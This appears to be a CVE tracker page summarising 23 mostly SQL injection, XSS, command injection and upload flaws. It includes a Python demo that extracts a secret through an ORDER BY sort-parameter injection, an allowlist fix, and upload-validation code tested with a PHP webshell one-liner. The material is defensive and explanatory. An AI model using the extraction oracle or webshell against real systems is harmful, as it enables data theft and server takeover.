23 CVEs tracked today. 0 Critical, 0 High, 13 Medium, 10 Low.
-
CVE-2025-11343
MEDIUM
CVSS 5.5
A security vulnerability has been detected in code-projects Student Crud Operation 3.3. Affected is an unknown function of the file delete.php: manipulation of the argument ID leads to SQL injection. The attack can be carried out remotely. The exploit has been disclosed publicly and m...
PHP
SQLi
Crud Operation System
-
CVE-2025-11341
MEDIUM
CVSS 5.5
A security flaw has been discovered in Jinher OA up to 2.0. It affects an unknown function of the file /c6/Jhsoft.Web.module/eformaspx/WebDesign.aspx/?type=SystemUserInfo&style=1, where manipulation of the request results in an XML external entity (XXE) reference. Remote exploitation is possible. The e...
XXE
Jinher Oa
-
CVE-2025-11334
MEDIUM
CVSS 5.5
A security flaw has been discovered in Campcodes Online Apartment Visitor Management System 1.0. Affected is an unknown function of the file /visitor-detail.php: manipulation of the argument editid results in SQL injection. The attack can be executed remotely. The exploit has been released to th...
PHP
SQLi
Online Apartment Visitor Management System
-
CVE-2025-11329
MEDIUM
CVSS 5.5
A flaw has been found in code-projects Online Course Registration 1.0. Affected is an unknown function of the file /admin/manage-students.php: manipulation of the argument ID causes SQL injection. The attack can be initiated remotely. The exploit has been published and may be used.
PHP
SQLi
Online Course Registration Site
-
CVE-2025-11318
MEDIUM
CVSS 5.5
A security flaw has been discovered in Tipray (厦门天锐科技股份有限公司) Data Leakage Prevention System (天锐数据泄露防护系统) 1.0. It affects unknown code of the file uploadWxFile.do: manipulation of the argument File results in unrestricted file upload. The attack may be performed remotely. The exploit ha...
Authentication Bypass
File Upload
Data Leakage Prevention System
-
CVE-2025-11317
MEDIUM
CVSS 5.5
A vulnerability was identified in Tipray (厦门天锐科技股份有限公司) Data Leakage Prevention System (天锐数据泄露防护系统) 1.0. It affects the function findRolePage of the file findSingConfigPage.do: manipulation of the argument sort leads to SQL injection. The attack can be carried out remotely. The exploit ...
SQLi
Data Leakage Prevention System
-
CVE-2025-11316
MEDIUM
CVSS 5.5
A vulnerability was determined in Tipray (厦门天锐科技股份有限公司) Data Leakage Prevention System (天锐数据泄露防护系统) 1.0. Affected is the function findCategoryPage of the file findCategoryPage.do: manipulation of the argument tenantId can lead to SQL injection. The attack can be executed remotely...
SQLi
Data Leakage Prevention System
-
CVE-2025-11315
MEDIUM
CVSS 5.5
A vulnerability was found in Tipray (厦门天锐科技股份有限公司) Data Leakage Prevention System (天锐数据泄露防护系统) 1.0. Affected is the function findUserPage of the file findUserPage.do: manipulation of the argument sort results in SQL injection. Remote exploitation of the attack is possibl...
SQLi
Data Leakage Prevention System
-
CVE-2025-11314
MEDIUM
CVSS 5.5
A vulnerability has been found in Tipray (厦门天锐科技股份有限公司) Data Leakage Prevention System (天锐数据泄露防护系统) 1.0. Affected is the function findRolePage of the file findSingConfigPage.do: manipulation of the argument sort leads to SQL injection. The attack may be launched remotely. The exploit has been discl...
SQLi
Data Leakage Prevention System
-
CVE-2025-11313
MEDIUM
CVSS 5.5
A flaw has been found in Tipray (厦门天锐科技股份有限公司) Data Leakage Prevention System (天锐数据泄露防护系统) 1.0. It affects the function findRolePage of the file findRolePage.do: manipulation of the argument sort causes SQL injection. The attack may be initiated remotely. The exploit has been published and may be...
SQLi
Data Leakage Prevention System
-
CVE-2025-11312
MEDIUM
CVSS 5.5
A vulnerability was detected in Tipray (厦门天锐科技股份有限公司) Data Leakage Prevention System (天锐数据泄露防护系统) 1.0. It affects the function findModulePage of the file findModulePage.do: manipulation of the argument sort results in SQL injection. The attack can be launched remotely. The exploit is now public an...
SQLi
Data Leakage Prevention System
-
CVE-2025-11311
MEDIUM
CVSS 5.5
A security vulnerability has been detected in Tipray (厦门天锐科技股份有限公司) Data Leakage Prevention System (天锐数据泄露防护系统) 1.0. The affected element is the function findTenantPage of the file findTenantPage.do: manipulation of the argument sort leads to SQL injection. The attack can be initiated remotely. The ...
SQLi
Data Leakage Prevention System
-
CVE-2025-11310
MEDIUM
CVSS 5.5
A weakness has been identified in Tipray (厦门天锐科技股份有限公司) Data Leakage Prevention System (天锐数据泄露防护系统) 1.0. The affected element is the function findFileServerPage of the file findFileServerPage.do: manipulation of the argument sort can lead to SQL injection. It is possible to launch the attack r...
SQLi
Data Leakage Prevention System
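Seven of the Tipray entries above share one pattern: a paging endpoint whose `sort` argument ends up in the query. A sort column is an identifier, so it cannot be bound as a parameter, and the usual shortcut is string concatenation into ORDER BY. The following is an added example, not Tipray's code: a hypothetical `findUserPage`-style handler over a constructed SQLite schema, the boolean-based extraction an attacker gets from nothing more than a sort expression, and the allowlist form that closes it. Table and column names, the `secrets` table and the payload are all assumptions for the demonstration.

```python
import sqlite3
import string

# Constructed demo schema (not Tipray's): the table the paging endpoint lists,
# plus a table the endpoint should never be able to disclose.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, role TEXT);
        CREATE TABLE secrets(id INTEGER PRIMARY KEY, value TEXT);
        INSERT INTO users VALUES (1, 'alice', 'admin'), (2, 'bob', 'user'), (3, 'carol', 'user');
        INSERT INTO secrets VALUES (1, 's3cr3t-token');
    """)
    return conn

def find_user_page_vulnerable(conn, sort):
    """Hypothetical paging handler. The client-supplied sort value is
    concatenated into ORDER BY because an identifier cannot be a bound
    parameter; this is exactly where 'sort' reaches the SQL text."""
    return conn.execute("SELECT id, name FROM users ORDER BY " + sort).fetchall()

def leak_secret_vulnerable(conn, length):
    """Boolean-based extraction through the sort parameter alone.
    The injected CASE flips the sort key between id and -id depending on a
    condition about the secret, so the first row returned is a one-bit oracle."""
    alphabet = string.ascii_lowercase + string.digits + "-"
    leaked = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            payload = (f"(CASE WHEN (SELECT substr(value, {pos}, 1) FROM secrets) = '{ch}' "
                       f"THEN id ELSE -id END)")
            rows = find_user_page_vulnerable(conn, payload)
            if rows[0][1] == "alice":   # ascending by id: the condition held
                leaked += ch
                break
    return leaked

# Hardened form: map the client value onto a fixed allowlist of identifiers and
# a fixed pair of directions; the raw string never enters the statement.
ALLOWED_SORT_COLUMNS = {"id": "id", "name": "name", "role": "role"}

def find_user_page_hardened(conn, sort="id", direction="asc"):
    column = ALLOWED_SORT_COLUMNS.get(sort)
    if column is None:
        raise ValueError(f"unsupported sort column: {sort!r}")
    if direction.lower() not in ("asc", "desc"):
        raise ValueError(f"unsupported sort direction: {direction!r}")
    sql = f"SELECT id, name FROM users ORDER BY {column} {direction.upper()}"
    return conn.execute(sql).fetchall()

def sort_is_rejected(conn, sort):
    """True when the hardened handler refuses the value outright."""
    try:
        find_user_page_hardened(conn, sort)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print("leaked via sort:", leak_secret_vulnerable(db, 12))
    print("hardened rejects payload:",
          sort_is_rejected(db, "(CASE WHEN 1=1 THEN id ELSE -id END)"))
```

The oracle needs no error message and no UNION: a single page of results ordered one way or the other is enough to read the `secrets` table one character per request. The fix is the lookup, not escaping; there is no quoting rule that makes an arbitrary expression safe inside ORDER BY.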
-
CVE-2025-11342
LOW
CVSS 2.0
SQL injection in code-projects Online Course Registration 1.0 allows high-privileged remote attackers to manipulate the coursecode parameter in /admin/edit-course.php, potentially extracting or modifying database contents. The CVSS 4.0 vector reflects limited scope (confidentiality and integrity impact confined to the database layer, with no expansion beyond it), and the vulnerability requires administrative authentication (PR:H), which significantly constrains real-world risk despite public exploit availability; the 0.03% EPSS score indicates minimal likelihood of spontaneous exploitation.
PHP
SQLi
Online Course Registration Site
-
CVE-2025-11335
LOW
CVSS 2.0
Command injection in D-Link DI-7100G C1 firmware up to version 20250928 allows remote authenticated attackers to execute arbitrary commands via the iface parameter in the /msp_info.htm?flag=qos endpoint of the jhttpd component. The vulnerability requires high-level administrative privileges. Publicly available exploit code exists, but the EPSS score of 0.06% indicates that exploitation in the wild is unlikely, consistent with the privilege requirement.
Command Injection
D-Link
Di 7100g C1 Firmware
-
CVE-2025-11333
LOW
CVSS 1.9
Stored cross-site scripting (XSS) in Langley FCU Online Banking System via the First Name field on the Add Customer page (/customer_add_action.php) allows high-privileged authenticated users to inject scripts that execute for other users who view the stored record. The CVSS score of 1.9 reflects the high privilege requirement (PR:H) and the user interaction dependency (UI:P), limiting real-world risk despite public exploit availability. No active exploitation had been confirmed in CISA KEV at the time of analysis.
PHP
XSS
-
CVE-2025-11332
LOW
CVSS 2.0
Reflected cross-site scripting (XSS) in CmsEasy up to version 7.7.7 allows authenticated remote attackers to inject malicious scripts via manipulation of the PHP_SELF argument in the URL handler component (lib/inc/view.php). Triggering it requires user interaction (clicking a malicious link) and an authenticated session, resulting in limited integrity impact. Publicly available exploit code exists, though the EPSS score remains low at 0.03%, reflecting the significant prerequisites (authentication and a user click) that limit real-world exploitation. The vendor has not responded to disclosure attempts.
PHP
XSS
Cmseasy
-
CVE-2025-11331
LOW
CVSS 2.0
Command injection in IdeaCMS up to version 1.8 allows high-privileged remote attackers to execute arbitrary system commands via manipulation of the 网站名称 (website name) parameter in the Website Name Handler component. The vulnerability exists in app/common/logic/admin/Config.php and requires high-privilege credentials but has publicly available exploit code and carries notable risk given the vendor's non-responsiveness to early disclosure.
PHP
Command Injection
Ideacms
-
CVE-2025-11330
LOW
CVSS 2.1
SQL injection in PHPGurukul Beauty Parlour Management System 1.1 allows authenticated remote attackers to execute arbitrary SQL queries via manipulated fromdate and todate parameters in /admin/sales-reports-detail.php. The vulnerability has low real-world impact (CVSS 2.1, EPSS 0.04%) despite public exploit availability, as it requires valid admin authentication and yields only limited data disclosure without full database manipulation capability.
PHP
SQLi
Beauty Parlour Management System
-
CVE-2025-11322
LOW
CVSS 2.9
Weak password requirements in Mangati NovoSGA up to version 2.2.12 allow remote attackers to bypass password policy validation during user account creation via manipulation of the Senha/Confirmação da senha (password/password confirmation) parameters on the /novosga.users/new endpoint. The vulnerability is difficult to exploit (CVSS AC:H) and offers only low confidentiality impact, but public exploit code is available and enables brute-force attacks against weak user credentials. EPSS score of 0.04% (percentile 12%) indicates limited real-world exploitation likelihood despite CVE publication.
Information Disclosure
Brute Force
-
CVE-2025-11321
LOW
CVSS 2.1
Authorization bypass in zhuimengshaonian wisdom-education up to version 1.0.4 allows authenticated remote attackers to manipulate the subjectId parameter in WrongBookController.java to access unauthorized resources. The vulnerability has a low CVSS score (2.1) due to limited confidentiality impact and requirement for prior authentication, but publicly available exploit code exists and the attack vector is entirely network-accessible.
Authentication Bypass
Java
-
CVE-2025-11320
LOW
CVSS 2.1
Unrestricted file upload in zhuimengshaonian wisdom-education up to version 1.0.4 allows authenticated remote attackers to upload arbitrary files via the uploadFile function in UploadController.java, potentially enabling remote code execution or system compromise. Exploit code has been publicly disclosed. Despite a low CVSS score of 2.1 reflecting limited direct impact scope, the public exploit, together with the Authentication Bypass tag carried by this entry, suggests practical exploitation risk in environments where an attacker can reach the endpoint.
Authentication Bypass
Java
File Upload
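Two entries on this page (Tipray's uploadWxFile.do and wisdom-education's uploadFile) are unrestricted upload bugs, where a server stores whatever the client names and sends. The following is an added example of the server-side checks that turn an upload endpoint into a restricted one; it is not code from either project. The accepted types, the size limit, the exception name and the `validate_upload` function are assumptions for the demonstration.

```python
import os
import secrets

# Content types this hypothetical endpoint is willing to store, keyed by the
# extension the server will assign, with the leading bytes a real file of
# that type must carry.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "pdf": b"%PDF-",
}

class UploadRejected(ValueError):
    pass

def validate_upload(client_filename, content, max_bytes=5 * 1024 * 1024):
    """Return (extension, stored_name) for an acceptable upload, else raise.
    Decisions rest on the bytes and the final extension only: the client's
    path, declared MIME type and any earlier extensions are never trusted."""
    if not content or len(content) > max_bytes:
        raise UploadRejected("empty or oversized body")
    # Keep only the basename; this strips ../ segments and absolute paths
    # from the client value before anything looks at it.
    base = os.path.basename(client_filename.replace("\\", "/"))
    if not base or "\x00" in base:
        raise UploadRejected("invalid filename")
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    magic = ALLOWED_TYPES.get(ext)
    if magic is None:
        raise UploadRejected(f"extension not allowed: {ext!r}")
    if not content.startswith(magic):
        raise UploadRejected("content does not match declared type")
    # The stored name is chosen by the server: nothing the client sent
    # reaches the filesystem, so shell.php, a.png\x00.php and friends cannot.
    stored = f"{secrets.token_hex(16)}.{ext}"
    return ext, stored

def upload_is_rejected(client_filename, content):
    """True when validate_upload refuses the (name, bytes) pair."""
    try:
        validate_upload(client_filename, content)
    except UploadRejected:
        return True
    return False

if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    print("webshell rejected:", upload_is_rejected("shell.php", b"<?php system($_GET['c']); ?>"))
    print("traversal name, png body:", validate_upload("../../var/www/html/x.png", png))
```

The validated file should still be written outside the web root and served with a fixed Content-Type; the checks above stop arbitrary files from landing on disk, but a PNG with a script appended is still a PNG to this function, so the web server must never be in a position to execute what it stores.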
-
CVE-2025-11319
LOW
CVSS 2.1
SQL injection in nahiduddinahammed Hospital-Management-System-Website allows authenticated remote attackers to execute arbitrary SQL queries via the ai parameter in /delete.php, with public exploit code available. The CVSS 2.1 score and 0.03% EPSS score indicate low real-world risk despite network accessibility, as exploitation requires valid user authentication and produces only limited confidentiality impact. The vendor has not responded to disclosure attempts.
PHP
SQLi